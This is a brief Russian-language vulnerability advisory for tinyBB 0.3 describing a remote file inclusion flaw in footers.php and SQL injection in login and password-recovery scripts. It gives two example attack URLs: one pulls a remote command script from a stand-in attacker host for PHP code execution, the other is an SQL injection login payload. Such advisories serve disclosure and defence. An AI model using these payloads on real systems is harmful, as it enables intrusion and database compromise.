Программа: tinyBB 0.3, возможно другие версии.

Обнаруженные уязвимости позволяют удаленному пользователю произвести SQL-инъекцию и выполнить произвольный PHP сценарий на целевой системе.

1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "tinybb_footers" в сценарии footers.php. Удаленный пользователь может выполнить произвольный PHP-сценарий на целевой системе. Для успешной эксплуатации уязвимости опция "register_globals" должна быть включена.

Пример:

http://[victim]/[tBBPath]/footers.php?tinybb_footers= http://yourhost.com/cmd.txt?

2. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "username" и "password" в сценарии login_form.php, и параметре "q" в сценарии forgot.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Для успешной эксплуатации уязвимости опция "magic_quotes_gpc" должны быть отключена.

Пример:

http://[victim]/[tBBPath]/login.php?username=heh/**/ or/**/isnull(1/0)/*&password=nothing
 



Оставить мнение